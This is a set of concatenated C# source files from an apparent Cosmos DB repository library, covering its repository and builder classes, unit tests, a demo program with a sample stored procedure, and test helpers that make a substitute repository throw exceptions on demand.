public IStoredProcedure<TParam1, TParam2, TParam3, TParam4, TParam5, TParam6, TParam7, TParam8, TParam9, TParam10, TParam11, TParam12, TParam13, TParam14, TParam15, TResult> StoredProcedure<TParam1, TParam2, TParam3, TParam4, TParam5, TParam6, TParam7, TParam8, TParam9, TParam10, TParam11, TParam12, TParam13, TParam14, TParam15, TResult>(string id) => new StoreProcedureImpl<TParam1, TParam2, TParam3, TParam4, TParam5, TParam6, TParam7, TParam8, TParam9, TParam10, TParam11, TParam12, TParam13, TParam14, TParam15, TResult>(_client, this, id);
public IStoredProcedure<TParam1, TParam2, TParam3, TParam4, TParam5, TParam6, TParam7, TParam8, TParam9, TParam10, TParam11, TParam12, TParam13, TParam14, TParam15, TParam16, TResult> StoredProcedure<TParam1, TParam2, TParam3, TParam4, TParam5, TParam6, TParam7, TParam8, TParam9, TParam10, TParam11, TParam12, TParam13, TParam14, TParam15, TParam16, TResult>(string id) => new StoreProcedureImpl<TParam1, TParam2, TParam3, TParam4, TParam5, TParam6, TParam7, TParam8, TParam9, TParam10, TParam11, TParam12, TParam13, TParam14, TParam15, TParam16, TResult>(_client, this, id);
private async Task<DocumentCollection> GetOrCreateCollectionAsync()
{
var resourceResponse = await _client.CreateDocumentCollectionIfNotExistsAsync(
await _documentDb.SelfLinkAsync,
new DocumentCollection { Id = Id, IndexingPolicy = _indexingPolicy },
new RequestOptions { OfferThroughput = _throughput });
if (_storedProcedures.Any())
{
var sps = (await _client.ReadStoredProcedureFeedAsync(resourceResponse.Resource.StoredProceduresLink)).ToArray();
foreach(var sp in _storedProcedures.Where(sp => sps.FirstOrDefault(p => p.Id == sp.Id)?.Body != sp.Body))
{
await _client.UpsertStoredProcedureAsync(resourceResponse.Resource.AltLink, sp);
}
}
return resourceResponse;
}
private (string id, string eTag) GetIdAndETag(T entity)
{
Func<object, (string id, string propertyInfo)> Factory(Type type)
{
(string name, PropertyInfo info) GetPropertyJsonName(PropertyInfo pi)
{
var jsonProperty = pi.GetCustomAttribute<JsonPropertyAttribute>();
return (jsonProperty?.PropertyName ?? pi.Name, pi);
}
var properties = type.GetProperties().Select(GetPropertyJsonName).ToDictionary(o => o.name, o => o.info);
var idProperty = properties["id"];
properties.TryGetValue("_etag", out var eTagProperty);
var source = Expression.Parameter(typeof(object), "src");
var typedSource = Expression.Variable(type, "source");
Expression idValue = Expression.Property(typedSource, idProperty);
if (idProperty.PropertyType != typeof(string))
{
idValue = Expression.Call(idValue, "ToString", new Type[0]);
}
Expression eTagValue = eTagProperty == null
? Expression.Constant(null, typeof(string))
: (Expression)Expression.Property(typedSource, eTagProperty);
if (eTagProperty != default && eTagProperty.PropertyType != typeof(string))
{
eTagValue = Expression.Call(eTagValue, "ToString", new Type[0]);
}
var newTuple = Expression.New(typeof((string, string)).GetConstructor(new[] { typeof(string), typeof(string) }), idValue, eTagValue);
var body = Expression.Block(new[] { typedSource }, Expression.Assign(typedSource, Expression.Convert(source, type)), newTuple);
return Expression.Lambda<Func<object, (string, string)>>(body, source).Compile();
}
return _idETagHelper.GetOrAdd(entity.GetType(), Factory)(entity);
}
private async Task<String> GetAltLink()
{
return (await _collection).AltLink;
}
}
}<file_sep>using Microsoft.Azure.Documents;
using System;
using System.Collections.Generic;
using System.Collections.ObjectModel;
using System.Linq;
namespace CosmosDbRepository.Implementation
{
internal class CosmosDbRepositoryBuilder<T>
: ICosmosDbRepositoryBuilder
{
private List<IncludedPath> _includePaths = new List<IncludedPath>();
private List<ExcludedPath> _excludePaths = new List<ExcludedPath>();
private List<StoredProcedure> _storedProcedure = new List<StoredProcedure>();
private IndexingMode _indexingMode = IndexingMode.Consistent;
private int? _throughput;
public string Id { get; private set; }
public ICosmosDbRepositoryBuilder WithId(string id)
{
Id = id;
return this;
}
public ICosmosDbRepositoryBuilder WithThroughput(int? throughput)
{
_throughput = throughput;
return this;
}
public ICosmosDbRepositoryBuilder IncludeIndexPath(string path, params Index[] indexes)
{
if (string.IsNullOrWhiteSpace(path))
{
throw new ArgumentException("Invalid Include Path", nameof(path));
};
_includePaths.Add(new IncludedPath
{
Path = path,
Indexes = (indexes?.Any() ?? false)
? new Collection<Index>(indexes)
: null
});
return this;
}
public ICosmosDbRepositoryBuilder ExcludeIndexPath(params string[] paths)
{
if (paths == null)
{
throw new ArgumentNullException(nameof(paths));
}
if (paths.Any(string.IsNullOrWhiteSpace))
{
throw new ArgumentException("Invalid Exclude Path", nameof(paths));
}
if (paths.Any())
{
_excludePaths.AddRange(paths.Select(path => new ExcludedPath { Path = path }));
};
return this;
}
public ICosmosDbRepositoryBuilder StoredProcedure(string id, string body)
{
_storedProcedure.Add(new StoredProcedure { Id = id, Body = body });
return this;
}
public ICosmosDbRepository Build(IDocumentClient client, ICosmosDb documentDb, int? defaultThroughput)
{
if (string.IsNullOrWhiteSpace(Id)) throw new InvalidOperationException("Id not specified");
var indexingPolicy = new IndexingPolicy
{
IndexingMode = _indexingMode
};
if (_includePaths.Any())
{
indexingPolicy.IncludedPaths = new Collection<IncludedPath>(_includePaths);
}
if (_excludePaths.Any())
{
indexingPolicy.ExcludedPaths = new Collection<ExcludedPath>(_excludePaths);
}
return new CosmosDbRepository<T>(client, documentDb, Id, indexingPolicy, _throughput ?? defaultThroughput, _storedProcedure);
}
}
}
<file_sep>using FluentAssertions;
using Microsoft.VisualStudio.TestTools.UnitTesting;
using Newtonsoft.Json;
using System;
using System.Linq;
using System.Threading.Tasks;
namespace CosmosDbRepositoryTest.SQL
{
[TestClass]
public class CosmosDbRepositoryJoinTests
: CosmosDbRepositoryTests<ComplexTestData<Guid>>
{
private const string _viewModelQuery =
"SELECT t.id, t.xRefId, t.date, g.dataType, g.dataCategory, g.numericValue " +
"FROM TestData t " +
"JOIN c IN t.childItems " +
"JOIN g IN c.grandchildItems " +
"WHERE c.booleanValue";
[TestMethod]
public async Task Find_Expect_Success()
{
using (var context = CreateContext())
{
var data = JsonConvert.DeserializeObject<ComplexTestData<Guid>>(_testData);
data = await context.Repo.UpsertAsync(data);
//var dataList = await context.Repo.FindAsync<ViewModel>(_viewModelQuery);
var dataList = (await context.Repo.SelectManyAsync(
t => t.ChildItems.Where(c => c.BooleanValue).SelectMany(c => c.GrandchildItems.Select(g => new { t.Id, t.XRefId, t.Date, g.DataType, g.DataCategory, g.NumericValue })))).ToArray();
dataList.Should().HaveCount(3);
dataList[0].DataType.Should().Be(data.ChildItems[0].GrandchildItems[0].DataType);
dataList[0].DataCategory.Should().Be(data.ChildItems[0].GrandchildItems[0].DataCategory);
dataList[0].NumericValue.Should().Be(data.ChildItems[0].GrandchildItems[0].NumericValue);
dataList[1].DataType.Should().Be(data.ChildItems[0].GrandchildItems[1].DataType);
dataList[1].DataCategory.Should().Be(data.ChildItems[0].GrandchildItems[1].DataCategory);
dataList[1].NumericValue.Should().Be(data.ChildItems[0].GrandchildItems[1].NumericValue);
dataList[2].DataType.Should().Be(data.ChildItems[2].GrandchildItems[0].DataType);
dataList[2].DataCategory.Should().Be(data.ChildItems[2].GrandchildItems[0].DataCategory);
dataList[2].NumericValue.Should().Be(data.ChildItems[2].GrandchildItems[0].NumericValue);
}
}
[TestMethod]
public async Task Find_Expect_Success_WithNoData()
{
using (var context = CreateContext())
{
await context.Repo.DeleteAsync();
// var dataList = await context.Repo.FindAsync<ViewModel>(_viewModelQuery);
var dataList = (await context.Repo.SelectManyAsync(
t => t.ChildItems.Where(c => c.BooleanValue).SelectMany(c => c.GrandchildItems.Select(g => new { t.Id, t.XRefId, t.Date, g.DataType, g.DataCategory, g.NumericValue })))).ToArray();
dataList.Should().BeEmpty();
}
}
[TestMethod]
public async Task Find_WithSkipTake_Expect_Success()
{
using (var context = CreateContext())
{
var data = JsonConvert.DeserializeObject<ComplexTestData<Guid>>(_testData);
data = await context.Repo.UpsertAsync(data);
// var dataList = await context.Repo.FindAsync<ViewModel>(_viewModelQuery + " OFFSET 2 LIMIT 2");
var dataList = (await context.Repo.SelectManyAsync(
t => t.ChildItems.Where(c => c.BooleanValue).SelectMany(c => c.GrandchildItems.Select(g => new { t.Id, t.XRefId, t.Date, g.DataType, g.DataCategory, g.NumericValue })),
selectClauses: q => q.Skip(2).Take(2))).ToArray();
dataList.Should().HaveCount(1);
dataList[0].DataType.Should().Be(data.ChildItems[2].GrandchildItems[0].DataType);
dataList[0].DataCategory.Should().Be(data.ChildItems[2].GrandchildItems[0].DataCategory);
dataList[0].NumericValue.Should().Be(data.ChildItems[2].GrandchildItems[0].NumericValue);
}
}
[TestMethod]
public async Task Find_WithPageLimit_Expect_Success()
{
using (var context = CreateContext())
{
var data = JsonConvert.DeserializeObject<ComplexTestData<Guid>>(_testData);
data = await context.Repo.UpsertAsync(data);
//var first = await context.Repo.FindAsync<ViewModel>(1, null, _viewModelQuery);
var first = await context.Repo.SelectManyAsync(1, null,
t => t.ChildItems.Where(c => c.BooleanValue).SelectMany(c => c.GrandchildItems.Select(g => new { t.Id, t.XRefId, t.Date, g.DataType, g.DataCategory, g.NumericValue })));
first.Items.Should().HaveCount(1);
first.Items[0].DataType.Should().Be(data.ChildItems[0].GrandchildItems[0].DataType);
first.Items[0].DataCategory.Should().Be(data.ChildItems[0].GrandchildItems[0].DataCategory);
first.Items[0].NumericValue.Should().Be(data.ChildItems[0].GrandchildItems[0].NumericValue);
//var second = await context.Repo.FindAsync<ViewModel>(2, first.ContinuationToken, _viewModelQuery);
var second = await context.Repo.SelectManyAsync(2, first.ContinuationToken,
t => t.ChildItems.Where(c => c.BooleanValue).SelectMany(c => c.GrandchildItems.Select(g => new { t.Id, t.XRefId, t.Date, g.DataType, g.DataCategory, g.NumericValue })));
second.Items.Should().HaveCount(2);
second.Items[0].DataType.Should().Be(data.ChildItems[0].GrandchildItems[1].DataType);
second.Items[0].DataCategory.Should().Be(data.ChildItems[0].GrandchildItems[1].DataCategory);
second.Items[0].NumericValue.Should().Be(data.ChildItems[0].GrandchildItems[1].NumericValue);
second.Items[1].DataType.Should().Be(data.ChildItems[2].GrandchildItems[0].DataType);
second.Items[1].DataCategory.Should().Be(data.ChildItems[2].GrandchildItems[0].DataCategory);
second.Items[1].NumericValue.Should().Be(data.ChildItems[2].GrandchildItems[0].NumericValue);
}
}
public class ViewModel
{
public Guid Id { get; set; }
public string XRefId { get; set; }
public DateTimeOffset Date { get; set; }
public string DataType { get; set; }
public string DataCategory { get; set; }
public float NumericValue { get; set; }
}
private const string _testData =
@"{
""id"": ""02f1dfe9-38b1-274e-2d8c-154a82b84e49"",
""tag"": ""ComplexTestData"",
""xRefId"": ""6b017a0d-7fb3-4aa7-bd03-b75f1f4ed5b2"",
""date"": ""2019-06-15T04:48:00+00:00"",
""childItems"": [
{
""booleanValue"": true,
""grandchildItems"": [
{
""dataType"": ""Type1"",
""dataCategory"": ""Category1"",
""createdAt"": ""2019-06-16T05:05:00+00:00"",
""numericValue"": 1.11,
},
{
""dataType"": ""Type1"",
""dataCategory"": ""Category2"",
""createdAt"": ""2019-06-16T05:05:00+00:00"",
""numericValue"": 1.12,
}
]
},
{
""booleanValue"": false,
""grandchildItems"": [
{
""dataType"": ""Type1"",
""dataCategory"": ""Category1"",
""createdAt"": ""2019-06-16T05:05:00+00:00"",
""numericValue"": 2.11
}
]
},
{
""booleanValue"": true,
""grandchildItems"": [
{
""dataType"": ""Type2"",
""dataCategory"": ""Category1"",
""createdAt"": ""2019-06-16T05:05:00+00:00"",
""numericValue"": 3.11
}
]
},
{
""booleanValue"": true,
""grandchildItems"": []
}
]
}";
}
}
<file_sep>using Microsoft.Azure.Documents;
using Microsoft.Azure.Documents.Client;
using Microsoft.Extensions.Configuration;
using Microsoft.Extensions.DependencyInjection;
using Microsoft.Extensions.Options;
using System;
using System.Collections.Generic;
using System.Collections.ObjectModel;
using System.IO;
using System.Linq;
using System.Threading.Tasks;
namespace CosmosDbRepository.Sample
{
public class Program
{
private static async Task Main(string[] args)
{
var configuration = new ConfigurationBuilder()
.SetBasePath(Directory.GetCurrentDirectory())
.AddJsonFile("appsettings.json", optional: false, reloadOnChange: true)
.AddEnvironmentVariables()
.AddUserSecrets<DocumentClientSettings>()
.Build();
var services = new ServiceCollection()
.Configure<DocumentClientSettings>(configuration.GetSection("DocumentClientSettings"))
.AddOptions()
.BuildServiceProvider();
var clientSettings = services.GetRequiredService<IOptions<DocumentClientSettings>>().Value;
// get the Azure DocumentDB client
var client = new DocumentClient(new Uri(clientSettings.EndpointUrl), clientSettings.AuthorizationKey, clientSettings.ConnectionPolicy);
// Run demo
var documentDb = new CosmosDbBuilder()
.WithId("Demo")
.WithDefaultThroughput(400)
.AddCollection<Person>(func: cb =>
{
cb
.IncludeIndexPath("/*", Index.Range(DataType.Number), Index.Hash(DataType.String, 3), Index.Spatial(DataType.Point))
.IncludeIndexPath("/Birthday/?", Index.Range(DataType.Number))
.ExcludeIndexPath("/FirstName/?", "/LastName/?")
.StoredProcedure("test",
@"// SAMPLE STORED PROCEDURE
function sample() {
var collection = getContext().getCollection();
// Query documents and take 1st item.
var isAccepted = collection.queryDocuments(
collection.getSelfLink(),
'SELECT * FROM root r',
function (err, feed, options) {
if (err) throw err;
// Check the feed and if empty, set the body to 'no docs found',
// else take 1st element from feed
if (!feed || !feed.length) {
var response = getContext().getResponse();
response.setBody('no docs found');
}
else {
var response = getContext().getResponse();
response.setBody(feed);
}
});
if (!isAccepted) throw new Error('The query was not accepted by the server.');
}");
})
.Build(client);
// create repository for persons and set Person.FullName property as identity field (overriding default Id property name)
var repo = documentDb.Repository<Person>();
var sp = repo.StoredProcedure<Person[]>("test");
// output all persons in our database, nothing there yet
PrintPersonCollection(await repo.FindAsync());
// create a new person
Person matt = new Person
{
FirstName = "Matt",
LastName = "TBA",
Birthday = new DateTime(1990, 10, 10),
PhoneNumbers =
new Collection<PhoneNumber>
{
new PhoneNumber {Number = "555", Type = "Mobile"},
new PhoneNumber {Number = "777", Type = "Landline"}
}
};
// add person to database's collection (if collection doesn't exist it will be created and named as class name -it's a convenction, that can be configured during initialization of the repository)
matt = await repo.UpsertAsync(matt);
matt = await repo.GetAsync(matt);
var mod = matt.Modified;
var matt2 = await repo.FindAsync(r => r.Modified == mod);
matt = await repo.ReplaceAsync(matt);
await repo.DeleteDocumentAsync(matt);
// create another person
Person jack = new Person
{
FirstName = "Jack",
LastName = "Smith",
Birthday = new DateTime(1990, 10, 10),
PhoneNumbers = new Collection<PhoneNumber>()
};
// add jack to collection
jack = await repo.UpsertAsync(jack);
// should output person and his two phone numbers
PrintPersonCollection(await repo.FindAsync());
// change birth date
matt.Birthday -= new TimeSpan(500, 0, 0, 0);
// remove landline phone number
matt.PhoneNumbers.RemoveAt(1);
// should update person
matt = await repo.UpsertAsync(matt);
// should output Matt with just one phone number
PrintPersonCollection(await repo.FindAsync());
// get Matt by his Id
Person justMatt = await repo.GetAsync(matt.FullName);
Console.WriteLine("GetByIdAsync result: " + justMatt);
// ... or by his first name
Person firstMatt = await repo.FindFirstOrDefaultAsync(p => p.FirstName.ToLower() == "matt");
Console.WriteLine("First: " + firstMatt);
// query all the smiths
var smiths = (await repo.FindAsync(p => p.LastName.Equals("Smith"))).ToList();
Console.WriteLine(smiths.Count);
// use IQueryable, as for now supported expressions are 'Queryable.Where', 'Queryable.Select' & 'Queryable.SelectMany'
var allSmithsPhones =
(await repo.FindAsync()).SelectMany(p => p.PhoneNumbers).Select(p => p.Type);
foreach (var phone in allSmithsPhones)
{
Console.WriteLine(phone);
}
// count all persons
var personsCount = await repo.FindAsync();
// count all jacks
var jacksCount = await repo.FindAsync(p => p.FirstName == "Jack");
PrintPersonCollection(await sp.ExecuteAsync());
Console.ReadKey(true);
// remove matt from collection
await repo.DeleteDocumentAsync(matt.FullName);
// remove jack from collection
await repo.DeleteDocumentAsync(jack.FullName);
// should output nothing
PrintPersonCollection(await repo.FindAsync());
// remove collection
await repo.DeleteAsync();
await documentDb.DeleteAsync();
Console.ReadKey(true);
}
private static void PrintPersonCollection(IEnumerable<Person> people)
{
foreach (var person in people)
{
Console.WriteLine(person);
}
}
}
}
<file_sep>using CosmosDbRepository;
using Microsoft.Azure.Documents.Client;
using Microsoft.Extensions.Configuration;
using Microsoft.Extensions.DependencyInjection;
using Microsoft.Extensions.Options;
using Microsoft.VisualStudio.TestTools.UnitTesting;
using System;
using System.IO;
namespace CosmosDbRepositorySubstituteTest
{
[TestClass]
public static class TestFramework
{
public static ServiceProvider Services;
[AssemblyInitialize]
public static void Initialize(TestContext context)
{
var configuration = new ConfigurationBuilder()
.AddJsonFile(Path.Combine(AppDomain.CurrentDomain.BaseDirectory, "testsettings.json"))
.AddEnvironmentVariables()
.Build();
ServiceCollection services = new ServiceCollection();
services.Configure<CosmosDbConfig>(configuration.GetSection("CosmosDbConfig"));
services.Configure<TestConfig>(configuration.GetSection("TestConfig"));
services.Configure<EnvironmentConfig>(configuration.GetSection("EnvironmentConfig"));
Services = services.BuildServiceProvider();
var envConfig = Services.GetRequiredService<IOptions<EnvironmentConfig>>().Value;
if (envConfig.RandomizeDbName)
{
var dbConfig = Services.GetRequiredService<IOptions<CosmosDbConfig>>().Value ;
dbConfig.DbName = $"{dbConfig.DbName}!{Guid.NewGuid()}";
}
}
[AssemblyCleanup]
public static void Cleanup()
{
if (Services != null)
{
var envConfig = Services.GetRequiredService<IOptions<EnvironmentConfig>>().Value;
if (envConfig.DeleteDatabaseOnClose)
{
var dbConfig = Services.GetRequiredService<IOptions<CosmosDbConfig>>().Value;
var client = new DocumentClient(new Uri(dbConfig.DbEndPoint), dbConfig.DbKey);
var repo = new CosmosDbBuilder()
.WithId(dbConfig.DbName)
.WithDefaultThroughput(400)
.Build(client);
repo.DeleteAsync().Wait();
}
}
}
}
}
<file_sep>using System;
using System.Linq;
using System.Threading;
namespace CosmosDbRepositoryTest.StringId
{
public class CosmosDbRepositoryStringTests
: CosmosDbRepositoryTests<TestData<string>>
{
private readonly Random _random = new Random();
private static int _serialnumber;
protected string GetNewId()
{
var randomStr = new string(Enumerable.Range(0, 16).Select(_ => (char)_random.Next('A', 'Z' + 1)).ToArray());
return $"{randomStr}{Interlocked.Increment(ref _serialnumber):0000}";
}
}
}<file_sep>using Newtonsoft.Json;
namespace CosmosDbRepositoryTest
{
public class TestSubData
{
[JsonProperty("subsubdata")]
public TestSubSubData[] SubSubData { get; set; }
}
}<file_sep>using CosmosDbRepository;
using System;
using System.Threading.Tasks;
namespace CosmosDbRepositoryTest
{
public class CosmosDbRepositoryTests<T>
{
protected Task<TestData<Guid>> GetTestData(
TestingContext<TestData<Guid>> context,
string uniqueData,
int rank = 0,
Action<TestData<Guid>> setupAction = null)
{
var data = new TestData<Guid>
{
Id = Guid.NewGuid(),
Data = uniqueData,
Rank = rank
};
setupAction?.Invoke(data);
return context.Repo.AddAsync(data);
}
protected TestingContext<T> CreateContext(Action<ICosmosDbBuilder> builderCallback = null, Action<ICosmosDbRepositoryBuilder> repoBuilderCallback = null)
{
return new TestingContext<T>(builderCallback, repoBuilderCallback);
}
}
}<file_sep>using CosmosDbRepository.Types;
using FluentAssertions;
using Microsoft.VisualStudio.TestTools.UnitTesting;
using System;
using System.Threading.Tasks;
namespace CosmosDbRepositoryTest.DocId
{
[TestClass]
public class CosmosDbRepositoryGetTests
: CosmosDbRepositoryTests<TestData<DocumentId>>
{
[TestMethod]
public async Task Get_Expect_Success()
{
using (var context = CreateContext())
{
var data = new TestData<DocumentId>
{
Id = Guid.NewGuid(),
Data = "Old Data"
};
data = await context.Repo.AddAsync(data);
var data2 = await context.Repo.GetAsync(data);
data2.Should().BeEquivalentTo(data);
}
}
[TestMethod]
public async Task Get_ById_Expect_Success()
{
using (var context = CreateContext())
{
var data = new TestData<DocumentId>
{
Id = Guid.NewGuid(),
Data = "Old Data"
};
data = await context.Repo.AddAsync(data);
var data2 = await context.Repo.GetAsync(data.Id);
data2.Should().BeEquivalentTo(data);
}
}
[TestMethod]
public async Task Get_NotFound_Expect_Success()
{
using (var context = CreateContext())
{
var data = new TestData<DocumentId>
{
Id = Guid.NewGuid(),
Data = "Old Data"
};
var data2 = await context.Repo.GetAsync(data);
data2.Should().Be(default);
}
}
[TestMethod]
public async Task Get_ById_NotFound_Expect_Success()
{
using (var context = CreateContext())
{
var data = new TestData<DocumentId>
{
Id = Guid.NewGuid(),
Data = "Old Data"
};
var data2 = await context.Repo.GetAsync(data.Id);
data2.Should().Be(default);
}
}
}
}
<file_sep>using Newtonsoft.Json;
using System;
namespace CosmosDbRepositoryTest
{
public class TestSubSubData
{
[JsonProperty("id")]
public Guid Id { get; set; }
[JsonProperty("value")]
public string Value { get; set; }
}
}<file_sep>using CosmosDbRepository;
using CosmosDbRepository.Substitute;
namespace CosmosDbRepositorySubstituteTest
{
public class TestingSubstituteContext<T>
: ITestingContext<T>
{
public ICosmosDbRepository<T> Repo { get; private set; }
public TestingSubstituteContext()
{
Repo = new CosmosDbRepositorySubstitute<T>();
}
public void Dispose()
{
}
}
}<file_sep>using System;
using System.Threading.Tasks;
namespace CosmosDbRepositoryTest
{
public static class ExceptionExtensions
{
public static Task ShollowException(this Task task)
=> task.ContinueWith(_ => { }, TaskContinuationOptions.ExecuteSynchronously);
}
}
<file_sep>using FluentAssertions;
using Microsoft.Azure.Documents;
using Microsoft.VisualStudio.TestTools.UnitTesting;
using System;
using System.Linq;
using System.Net;
using System.Threading.Tasks;
namespace CosmosDbRepositoryTest.GuidId
{
[TestClass]
public class CosmosDbRepositoryAddTests
: CosmosDbRepositoryTests<TestData<Guid>>
{
[TestMethod]
public async Task Add_Expect_Success()
{
using (var context = CreateContext())
{
var data = new TestData<Guid>
{
Id = Guid.NewGuid(),
Data = "My Data"
};
await context.Repo.AddAsync(data);
}
}
[TestMethod]
public async Task Add_Expect_Conflict()
{
using (var context = CreateContext())
{
var data = new TestData<Guid>
{
Id = Guid.NewGuid(),
Data = "My Data"
};
await context.Repo.AddAsync(data);
var faultedTask = context.Repo.AddAsync(data);
await faultedTask.ShollowException();
faultedTask.IsFaulted.Should().BeTrue();
faultedTask.Exception.InnerExceptions.Should().HaveCount(1);
var dce = faultedTask.Exception.InnerExceptions.Single() as DocumentClientException;
dce.StatusCode.Should().Be(HttpStatusCode.Conflict);
}
}
}
}
<file_sep>using System;
namespace CosmosDbRepositorySubstituteTest
{
public class TestConfig
{
public string CollectionName { get; set; }
internal TestConfig Clone()
{
return new TestConfig
{
CollectionName = CollectionName
};
}
}
}<file_sep>using Newtonsoft.Json;
namespace CosmosDbRepositorySubstituteTest
{
public class TestData<T>
{
[JsonProperty("id")]
public T Id { get; set; }
[JsonProperty("data")]
public string Data { get; set; }
[JsonProperty("rank")]
public int Rank { get; set; }
[JsonProperty("_etag")]
public string ETag { get; set; }
[JsonProperty("_ts")]
public long UpdateEpoch { get; set; }
}
}<file_sep>using CosmosDbRepository.Types;
using System;
using System.Net;
namespace CosmosDbRepository.Substitute
{
public static class CosmosDbRepositorySubstituteExtensions
{
public static void GenerateExceptionOnGetWhen<T>(this ICosmosDbRepository<T> self,
Predicate<DocumentId> predicate,
HttpStatusCode statusCode,
string message = default)
{
if (self is null) throw new ArgumentNullException(nameof(self));
if (predicate is null) throw new ArgumentNullException(nameof(predicate));
if (!(self is CosmosDbRepositorySubstitute<T> substitute))
throw new ArgumentException($"self is not a CosmosDbRepositorySubstitute<{typeof(T).Name}>", nameof(self));
substitute.GenerateExceptionOnGetWhen(predicate, statusCode, message);
}
public static void GenerateExceptionOnGetWhen<T>(this ICosmosDbRepository<T> self,
Predicate<T> predicate,
HttpStatusCode statusCode,
string message = default)
{
if (self is null) throw new ArgumentNullException(nameof(self));
if (predicate is null) throw new ArgumentNullException(nameof(predicate));
if (!(self is CosmosDbRepositorySubstitute<T> substitute))
throw new ArgumentException($"self is not a CosmosDbRepositorySubstitute<{typeof(T).Name}>", nameof(self));
substitute.GenerateExceptionOnGetWhen(predicate, statusCode, message);
}
public static void ClearGenerateExceptionOnGet<T>(this ICosmosDbRepository<T> self)
{
if (self is null) throw new ArgumentNullException(nameof(self));
if (!(self is CosmosDbRepositorySubstitute<T> substitute))
throw new ArgumentException($"self is not a CosmosDbRepositorySubstitute<{typeof(T).Name}>", nameof(self));
substitute.ClearGenerateExceptionOnGet();
}
public static void GenerateExceptionOnAddWhen<T>(this ICosmosDbRepository<T> self,
Predicate<T> predicate,
HttpStatusCode statusCode,
string message = default)
{
if (self is null) throw new ArgumentNullException(nameof(self));
if (predicate is null) throw new ArgumentNullException(nameof(predicate));
if (!(self is CosmosDbRepositorySubstitute<T> substitute))
throw new ArgumentException($"self is not a CosmosDbRepositorySubstitute<{typeof(T).Name}>", nameof(self));
substitute.GenerateExceptionOnAddWhen(predicate, statusCode, message);
}
public static void ClearGenerateExceptionOnAdd<T>(this ICosmosDbRepository<T> self)
{
if (self is null) throw new ArgumentNullException(nameof(self));
if (!(self is CosmosDbRepositorySubstitute<T> substitute))
throw new ArgumentException($"self is not a CosmosDbRepositorySubstitute<{typeof(T).Name}>", nameof(self));
substitute.ClearGenerateExceptionOnAdd();
}
public static void GenerateExceptionOnDeleteWhen<T>(this ICosmosDbRepository<T> self,
Predicate<DocumentId> predicate,
HttpStatusCode statusCode,
string message = default)
{
if (self is null) throw new ArgumentNullException(nameof(self));
if (predicate is null) throw new ArgumentNullException(nameof(predicate));
if (!(self is CosmosDbRepositorySubstitute<T> substitute))
throw new ArgumentException($"self is not a CosmosDbRepositorySubstitute<{typeof(T).Name}>", nameof(self));
substitute.GenerateExceptionOnDeleteWhen(predicate, statusCode, message);
}
public static void GenerateExceptionOnDeleteWhen<T>(this ICosmosDbRepository<T> self,
Predicate<T> predicate,
HttpStatusCode statusCode,
string message = default)
{
if (self is null) throw new ArgumentNullException(nameof(self));
if (predicate is null) throw new ArgumentNullException(nameof(predicate));
if (!(self is CosmosDbRepositorySubstitute<T> substitute))
throw new ArgumentException($"self is not a CosmosDbRepositorySubstitute<{typeof(T).Name}>", nameof(self));
substitute.GenerateExceptionOnDeleteWhen(predicate, statusCode, message);
}
public static void ClearGenerateExceptionOnDelete<T>(this ICosmosDbRepository<T> self)
{
if (self is null) throw new ArgumentNullException(nameof(self));
if (!(self is CosmosDbRepositorySubstitute<T> substitute))
throw new ArgumentException($"self is not a CosmosDbRepositorySubstitute<{typeof(T).Name}>", nameof(self));
substitute.ClearGenerateExceptionOnDelete();
}
public static void GenerateExceptionOnFindWhen<T>(this ICosmosDbRepository<T> self,
Func<bool> predicate,
HttpStatusCode statusCode,
string message = default)
{
if (self is null) throw new ArgumentNullException(nameof(self));
if (predicate is null) throw new ArgumentNullException(nameof(predicate));
if (!(self is CosmosDbRepositorySubstitute<T> substitute))
throw new ArgumentException($"self is not a CosmosDbRepositorySubstitute<{typeof(T).Name}>", nameof(self));
substitute.GenerateExceptionOnFindWhen(predicate, statusCode, message);
}
public static void ClearGenerateExceptionOnFind<T>(this ICosmosDbRepository<T> self)
{
if (self is null) throw new ArgumentNullException(nameof(self));
if (!(self is CosmosDbRepositorySubstitute<T> substitute))
throw new ArgumentException($"self is not a CosmosDbRepositorySubstitute<{typeof(T).Name}>", nameof(self));
substitute.ClearGenerateExceptionOnFind();
}
public static void GenerateExceptionOnFindFirstOrDefaultWhen<T>(this ICosmosDbRepository<T> self,
Func<bool> predicate,
HttpStatusCode statusCode,
string message = default)
{
if (self is null) throw new ArgumentNullException(nameof(self));
if (predicate is null) throw new ArgumentNullException(nameof(predicate));
if (!(self is CosmosDbRepositorySubstitute<T> substitute))
throw new ArgumentException($"self is not a CosmosDbRepositorySubstitute<{typeof(T).Name}>", nameof(self));
substitute.GenerateExceptionOnFindFirstOrDefaultWhen(predicate, statusCode, message);
}
public static void ClearGenerateExceptionOnFindFirstOrDefault<T>(this ICosmosDbRepository<T> self)
{
if (self is null) throw new ArgumentNullException(nameof(self));
if (!(self is CosmosDbRepositorySubstitute<T> substitute))
throw new ArgumentException($"self is not a CosmosDbRepositorySubstitute<{typeof(T).Name}>", nameof(self));
substitute.ClearGenerateExceptionOnFindFirstOrDefault();
}
public static void GenerateExceptionOnReplaceWhen<T>(this ICosmosDbRepository<T> self,
Predicate<T> predicate,
HttpStatusCode statusCode,
string message = default)
{
if (self is null) throw new ArgumentNullException(nameof(self));
if (predicate is null) throw new ArgumentNullException(nameof(predicate));
if (!(self is CosmosDbRepositorySubstitute<T> substitute))
throw new ArgumentException($"self is not a CosmosDbRepositorySubstitute<{typeof(T).Name}>", nameof(self));
substitute.GenerateExceptionOnReplaceWhen(predicate, statusCode, message);
}
public static void ClearGenerateExceptionOnReplace<T>(this ICosmosDbRepository<T> self)
{
if (self is null) throw new ArgumentNullException(nameof(self));
if (!(self is CosmosDbRepositorySubstitute<T> substitute))
throw new ArgumentException($"self is not a CosmosDbRepositorySubstitute<{typeof(T).Name}>", nameof(self));
substitute.ClearGenerateExceptionOnReplace();
}
public static void GenerateExceptionOnSelectWhen<T>(this ICosmosDbRepository<T> self,
Func<bool> predicate,
HttpStatusCode statusCode,
string message = default)
{
if (predicate is null) throw new ArgumentNullException(nameof(predicate));
if (self is null) throw new ArgumentNullException(nameof(self));
if (!(self is CosmosDbRepositorySubstitute<T> substitute))
throw new ArgumentException($"self is not a CosmosDbRepositorySubstitute<{typeof(T).Name}>", nameof(self));
substitute.GenerateExceptionOnSelectWhen(predicate, statusCode, message);
}
public static void ClearGenerateExceptionOnSelect<T>(this ICosmosDbRepository<T> self)
{
if (self is null) throw new ArgumentNullException(nameof(self));
if (!(self is CosmosDbRepositorySubstitute<T> substitute))
throw new ArgumentException($"self is not a CosmosDbRepositorySubstitute<{typeof(T).Name}>", nameof(self));
substitute.ClearGenerateExceptionOnSelect();
}
